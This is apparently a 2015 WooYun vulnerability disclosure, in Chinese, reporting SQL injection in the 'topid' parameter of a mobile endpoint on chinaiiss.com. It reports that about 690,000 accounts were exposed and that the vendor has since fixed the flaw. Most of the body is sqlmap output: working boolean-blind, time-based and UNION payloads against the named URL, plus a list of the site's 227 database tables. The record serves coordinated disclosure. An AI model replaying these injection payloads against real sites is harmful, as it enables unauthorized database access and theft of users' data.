当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144729

漏洞标题:中国战略网某站存在SQL注入可UNION(涉及69万账号信息)

相关厂商:chinaiiss.com

漏洞作者: 路人甲

提交时间:2015-10-04 16:13

修复时间:2015-10-09 10:56

公开时间:2015-10-09 10:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-04: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

http://wap.chinaiiss.com/do.php?ac=getnextarticle&do=touch&inajax=1&number=15&topid=4&vtype=touch 注入点:topid

11.jpg

CIS库:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 AND 8593=8593&vtype=touch
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))ZEyk)&vtype=touch
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 UNION ALL SELECT CONCAT(0x7178766a71,0x76596154616954595344,0x7178787671),NULL,NULL,NULL,NULL-- &vtype=touch
---
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
Database: cis
[227 tables]
+-------------------------------+
| forum_remark |
| iiss_admin |
| iiss_adminsession |
| iiss_admintype |
| iiss_answer |
| iiss_article |
| iiss_article_hezuo |
| iiss_article_sendmail |
| iiss_article_special |
| iiss_article_specialfield |
| iiss_articlefield |
| iiss_articlemodify |
| iiss_articlerelated |
| iiss_attachment |
| iiss_banned |
| iiss_blogger_iprecord |
| iiss_blogger_vote |
| iiss_bottom |
| iiss_clickcount |
| iiss_clickinfo |
| iiss_clicklocation |
| iiss_clickrecord |
| iiss_conference |
| iiss_conference_author_praise |
| iiss_conference_candidate |
| iiss_conference_praise_record |
| iiss_conference_user_medal |
| iiss_contest |
| iiss_contest_question |
| iiss_contest_record |
| iiss_contest_userquestion |
| iiss_contest_userscore |
| iiss_country |
| iiss_country_area |
| iiss_datatype |
| iiss_day |
| iiss_defense_elite |
| iiss_delrecord |
| iiss_downimage |
| iiss_facecount |
| iiss_figure |
| iiss_figure_character |
| iiss_figure_impression |
| iiss_figure_year |
| iiss_file_attachment |
| iiss_guestbook |
| iiss_hero |
| iiss_hire |
| iiss_history_today |
| iiss_hours |
| iiss_hours2 |
| iiss_image |
| iiss_image_comic |
| iiss_imagefield |
| iiss_index_accesslog |
| iiss_infocategory |
| iiss_infocomment |
| iiss_infomodel |
| iiss_jump |
| iiss_leader |
| iiss_links |
| iiss_links_record |
| iiss_linkscooper |
| iiss_linkstype |
| iiss_list_accesslog |
| iiss_livetelecast |
| iiss_livetelecast_article |
| iiss_member |
| iiss_member_failedlogins |
| iiss_member_field |
| iiss_member_recommend |
| iiss_member_verifycode |
| iiss_member_verifycode2 |
| iiss_milarea |
| iiss_milcontrast |
| iiss_milcountry |
| iiss_milcountryelse |
| iiss_mobile_apps |
| iiss_mobile_article |
| iiss_mobile_conference |
| iiss_mobile_image |
| iiss_mobile_manual |
| iiss_mobile_pk |
| iiss_mobile_version |
| iiss_mobile_wallpaper |
| iiss_navi |
| iiss_people |
| iiss_perspective |
| iiss_perspectivefield |
| iiss_pk |
| iiss_pkvote |
| iiss_pkvoteuser |
| iiss_promotion_iprecord |
| iiss_promotionlink |
| iiss_promotionstatistics |
| iiss_question |
| iiss_quick_member |
| iiss_review_record |
| iiss_session |
| iiss_sethome |
| iiss_spec_baodiaovote |
| iiss_spec_baodiaovotetotal |
| iiss_spec_nanhai |
| iiss_spec_qiongdingzhixia |
| iiss_spec_seekones |
| iiss_special |
| iiss_special_foruminfo |
| iiss_spiderpic |
| iiss_sysdata |
| iiss_table |
| iiss_tag |
| iiss_tagart |
| iiss_tagartspec |
| iiss_taghero |
| iiss_tagimg |
| iiss_tagperspective |
| iiss_tagsend |
| iiss_updatearticle |
| iiss_userquestion |
| iiss_viewrecord_201002 |
| iiss_viewrecord_201003 |
| iiss_viewrecord_201004 |
| iiss_viewrecord_201005 |
| iiss_viewrecord_201006 |
| iiss_viewrecord_201007 |
| iiss_viewrecord_201008 |
| iiss_viewrecord_201009 |
| iiss_viewrecord_201010 |
| iiss_viewrecord_201011 |
| iiss_viewrecord_201012 |
| iiss_viewrecord_201101 |
| iiss_viewrecord_201102 |
| iiss_viewrecord_201103 |
| iiss_viewrecord_201104 |
| iiss_viewrecord_201105 |
| iiss_viewrecord_201106 |
| iiss_viewrecord_201107 |
| iiss_viewrecord_201108 |
| iiss_viewrecord_201109 |
| iiss_viewrecord_201110 |
| iiss_viewrecord_201111 |
| iiss_viewrecord_201112 |
| iiss_viewrecord_201201 |
| iiss_viewrecord_201202 |
| iiss_viewrecord_201203 |
| iiss_viewrecord_201204 |
| iiss_viewrecord_201205 |
| iiss_viewrecord_201206 |
| iiss_viewrecord_201207 |
| iiss_viewrecord_201208 |
| iiss_viewrecord_201209 |
| iiss_viewrecord_201210 |
| iiss_viewrecord_201211 |
| iiss_viewrecord_201212 |
| iiss_viewrecord_201301 |
| iiss_viewrecord_201302 |
| iiss_viewrecord_201303 |
| iiss_viewrecord_201304 |
| iiss_viewrecord_201305 |
| iiss_viewrecord_201306 |
| iiss_viewrecord_201307 |
| iiss_viewrecord_201308 |
| iiss_viewrecord_201309 |
| iiss_viewrecord_201310 |
| iiss_viewrecord_201311 |
| iiss_viewrecord_201312 |
| iiss_viewrecord_201401 |
| iiss_viewrecord_201402 |
| iiss_viewrecord_201403 |
| iiss_viewrecord_201404 |
| iiss_viewrecord_201405 |
| iiss_viewrecord_201406 |
| iiss_viewrecord_201407 |
| iiss_viewrecord_201408 |
| iiss_viewrecord_201409 |
| iiss_viewrecord_201410 |
| iiss_viewrecord_201411 |
| iiss_viewrecord_201412 |
| iiss_viewrecord_201501 |
| iiss_viewrecord_201502 |
| iiss_viewrecord_201503 |
| iiss_viewrecord_201504 |
| iiss_viewrecord_201505 |
| iiss_viewrecord_201506 |
| iiss_viewrecord_201507 |
| iiss_viewrecord_201508 |
| iiss_viewrecord_201509 |
| iiss_viewrecord_201510 |
| iiss_viewrecord_day |
| iiss_viewrecord_daybysite |
| iiss_voice |
| iiss_voice_news |
| iiss_vote |
| iiss_votetype |
| iiss_voteuser |
| iiss_wap_article |
| iiss_wap_image |
| iiss_wap_pk |
| iiss_weaponspec |
| iiss_weibo_activeusers |
| iiss_weibo_friendships |
| iiss_weibo_repost |
| iiss_weibo_repostrecord |
| iiss_weibo_repostusers_record |
| iiss_weibo_tokenuser |
| iiss_weibo_users |
| iiss_wikipedia |
| iiss_wikipediaedition |
| iiss_wikipediafield |
| iiss_worship |
| iiss_writer |
| iiss_writerart |
| iiss_writerartfield |
| iiss_yearvoterecord |
| iissblog_album |
| iissblog_blog |
| iissblog_blog2 |
| iissblog_class |
| iissblog_comment |
| iissblog_favorites |
| iissblog_feed |
| iissblog_log |
| iissblog_pic |
| iissblog_pic_favorites |
| iissblog_user |
| iissblog_user_20140806 |
| iissblog_viewnum |
+-------------------------------+

69万账户:

12.png

13.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-08 23:54

厂商回复:

感谢支持

最新状态:

2015-10-09:已修复,感谢支持

2015-10-09:感谢支持